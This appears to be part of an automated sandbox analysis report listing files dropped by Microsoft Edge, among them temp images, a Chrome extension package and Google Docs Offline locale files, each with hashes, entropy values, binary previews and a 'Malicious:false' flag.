                                                                                                                                                                                                                                                                                          Entropy (8bit):7.9961120748813075
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
                                                                                                                                                                                                                                                                                          MD5:01E352D35675990A139199DD86B38AAC
                                                                                                                                                                                                                                                                                          SHA1:E16163C81E5F36B3B819AA0A63BFA63D88548A91
                                                                                                                                                                                                                                                                                          SHA-256:148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
                                                                                                                                                                                                                                                                                          SHA-512:75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:...........m{..(.}...7.\...N.D*.w..m..q....%XfL.*I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'.*.."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g.*.^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\6a6250da-9da5-4bab-bdf4-83d8434d9b1e.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):206855
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.983996634657522
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
                                                                                                                                                                                                                                                                                          MD5:788DF0376CE061534448AA17288FEA95
                                                                                                                                                                                                                                                                                          SHA1:C3B9285574587B3D1950EE4A8D64145E93842AEB
                                                                                                                                                                                                                                                                                          SHA-256:B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
                                                                                                                                                                                                                                                                                          SHA-512:3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:......Exif..II*.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..*B.P..*(.................*.....................( ..................*.. .".... .".......(.. .".....*.. ....o......E.6... ..*..."........."J......Ah......@.@@....:@{6..wCp..3...((.(......................*...@..(...."....................*......*.. ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\794812dd-6091-4367-b49c-c73c9ab97a59.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1539024
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.991225831646159
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:24576:ZVFPKhp6EUYhzV51q184D2skdPTpnBOxs6gJLSnORAIBx6LpI9brLetNBII:Zzsp6QZqu4pkddnMO8IBY6ZfOBII
                                                                                                                                                                                                                                                                                          MD5:B2A5720EB489FBF9F83DA81545B8D809
                                                                                                                                                                                                                                                                                          SHA1:B1354110590D4935FE94D8F707783EBB75EF979A
                                                                                                                                                                                                                                                                                          SHA-256:39C148B3B7209F4BD8B5FA9CE1B63F500C7F92EFAA55DEC73987892268176A7E
                                                                                                                                                                                                                                                                                          SHA-512:7EC584925B9F913B4AFD1451AAB1CE1AC580AC2C5DE6AA99EE0D370D44D83628C08F41E73BA5436B04EB52688EEDE6BE2439C4A614992EC2F2D2CE701F71E962
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR... ... .....szz.....tEXtSoftware.Adobe ImageReadyq.e<...qiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.5-c014 79.151481, 2013/03/13-12:09:15 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:OriginalDocumentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628" xmpMM:DocumentID="xmp.did:91EA24D7191011E5B1FF9488C51C29D1" xmpMM:InstanceID="xmp.iid:91EA24D6191011E5B1FF9488C51C29D1" xmp:CreatorTool="Adobe Photoshop CC (Windows)"> <xmpMM:DerivedFrom stRef:instanceID="xmp.iid:6a6b844a-8117-4c4c-9b2f-30d3769ed7c7" stRef:documentID="xmp.did:695f8e9f-409d-324a-b50a-1e3067707628"/> </rdf:Description> </rdf:RDF> </x:xmpmeta> <?xpacket end="r"?>^.i.....IDATx.bb .0..;./..;@...A.P9F...y

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\9efce8d4-047e-4579-a6b9-85eb1da4e78f.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):11185
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.951995436832936
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
                                                                                                                                                                                                                                                                                          MD5:78E47DDA17341BED7BE45DCCFD89AC87
                                                                                                                                                                                                                                                                                          SHA1:1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
                                                                                                                                                                                                                                                                                          SHA-256:67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
                                                                                                                                                                                                                                                                                          SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\a9d2c12f-b4bc-4d79-befd-d379c6c2136d.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1
                                                                                                                                                                                                                                                                                          Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                          MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                          SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                          SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                          SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\cv_debug.log

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1420
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.394723642207852
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:YDG5LwRD0s/Up5fP1x5fn7Zu0QRWE5fR+nh0Qut5fxjK0krVgdL5frVcR0krV+5M:YDG5LOD0s8p5nX5/o0KWE5JC0Nt5pO0A
                                                                                                                                                                                                                                                                                          MD5:8F8C89E546AFCB29B37EC399645E7ED0
                                                                                                                                                                                                                                                                                          SHA1:3B52EEA8E2999C32C58B284549991CD4D34696B4
                                                                                                                                                                                                                                                                                          SHA-256:5B726E5FF87DD35182C92A4FB0EF5591FCDDE3AB7AD0593881835E51977116E1
                                                                                                                                                                                                                                                                                          SHA-512:6FCAD0685AAF09B771EC01B63A3B08FDC0B44520B418F951D0F5F33997ECCDC0B7478FF23C6CBAD09DD0DFC06EA6BB778545A118DDF7079C73E45E1D39736E60
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"logTime": "1005/085948", "correlationVector":"8sNXFnC9i2+S99lAzDH6Rq","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/085948", "correlationVector":"81A02D7FC86E45EDA6CBCA8671A98AFF","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/085948", "correlationVector":"NiTqUUpDli2IJjzrRApLSF","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091044", "correlationVector":"4hXMqVe30Bl32fn1+6AOy1","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091053", "correlationVector":"D7BB119EE9F4429BBF8B8E46242DB5E9","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/091235", "correlationVector":"Wk5x1on3JpNq4FXPG6U9B5","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091235", "correlationVector":"EC448E7330FA4F5EA1E7898FDD3F2CB6","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/091436", "correlationVector":"Ltc1GKjZ6R4P7ed5oiO6YB","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/091437", "correlationVector":"A569DB44

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\0d82cc1b-22b2-47a6-93b3-95ca06f1743a.tmp

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):154477
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                          MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                          SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                          SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                          SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):4982
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                          MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                          SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                          SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                          SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):908
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                          MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                          SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                          SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                          SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1285
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                          MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                          SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                          SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                          SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1244
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                          MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                          SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                          SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                          SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):977
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                          MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                          SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                          SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                          SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir2320_1195486961\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):3107
                                                                                                                                                                                                                                                                                          Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                          MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                          SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                          SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                          SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                          Malicious:false
